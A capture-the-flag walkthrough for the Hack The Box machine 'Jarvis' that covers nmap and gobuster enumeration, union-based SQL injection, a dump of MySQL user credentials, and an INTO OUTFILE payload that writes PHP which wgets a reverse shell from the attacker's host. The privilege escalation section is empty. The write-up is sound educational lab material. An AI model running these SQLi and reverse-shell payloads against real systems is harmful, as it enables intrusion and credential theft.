HTB - Jarvis

Linux | SQLi | Sudo

Tools For This Room

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain foothold by uploading reverse shell file through SQLi exploit

  3. Privesc

Scanning & Enumeration

Let's start off with nmap as usual.

  • nmap

nmap -sV -sC -vv <IP>

The following ports are open to us: 22: SSH 80: HTTP

We also run a full port scan in the background, but it yields no other ports.

Visiting the website at port80 gives us a page for a luxury hotel:

We find 2 possible domain names at the bottom, which we'll add to etc/hosts. 

sudo gedit /etc/hosts
<IP> supersecurehotel.htb logger.htb

However, they lead back to the same page when we check them out.

Let's enumerate further with gobuster to see what directories are available to us.

  • gobuster

gobuster dir -u <IP> -w <wordlist>

We get the usual array of directories, but /phpmyadmin gives us a login page. Unfortunately, the usual combinations of admin/password, etc don't work here.

Let's return to the hotel website and see if we can find anything useful. After some poking around, we find that the rooms provide a parameter called cod which changes by room. There could be a SQLi which we can exploit here.

PS: Check out Jurassic Park on TryHackMe for practice on a very similar SQLi room. Shameless plug for my walkthrough is here.

Let's try some basic SQLi input, by appending the following to the end of the URL:

' or 1=1

It throws an error which is a very encouraging sign.

Gaining Foothold

Now that we've determined that its vulnerable to SQLi, there are a few steps which we'll take to enumerate the database. First of all, we need to find out how many columns are in the table. To do this, we'll append the following to the URL while adding a number to the end, till it triggers an error. The error is triggered on number 8, which means that there are 7 columns. 

order by 1
order by 1,2
order by 1,2,3
...
order by 1,2,3,4,5,6,7,8

Next, we need to find out which columns correspond to the output on the page. We'll append the following to the URL to do this. However, we also need to change the cod value to a non-existent listing such as 99, so that the numbers are printed in the output.

http://10.10.10.143/room.php?cod=99 union all select 1,2,3,4,5,6,7

Here we see which numbers correspond to which columns.

From here, we can query the system to learn more about it. Replacing the number 2 with "database()", we can get the database's name.

union all select 1,database(),3,4,5,6,7

Here we get the name of the database.

A handy resource is Pentestmonkey's SQLi cheat sheet. Here we can find some commands to get information such as usernames and passwords. After a bit of tweaking and trial-and-error, we find the following command works:

union all select 1,(select group_concat(host,user,password) FROM mysql.user),3,4,5,6,7

We now know that host is localhost, user is DBadmin, and the hashed password.

A quick trip to crackstation reveals the password to be: imissyou.

Let's try to get a reverse shell now. Rana Khalil has an amazing write up on how to do this here. This is a 3 part process, which involves getting the server to create a file with instructions to transfer a reverse shell file from our machine to the victim. Next we'll execute the file containing these instructions, and transfer our reverse shell file over. Lastly, we'll execute the reverse shell file and get our shell. So let's start up a server and a netcat listener:

python -m SimpleHTTPServer
nc -lvnp 4444

Now to create a file on the server with commands to transfer a reverse shell file over.

union select 1,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.12:5555/php-reverse-shell.php\");?>'),3,4,5,6,7 INTO OUTFILE '/var/www/html/test4.php'

Then we execute the file, transferring the reverse shell file over.

<IP>/test4.php

Finally we execute our reverse shell file, and get our shell!

Privilege Escalation

PreviousHTB - SenseNextHTB - Popcorn

Last updated

Was this helpful?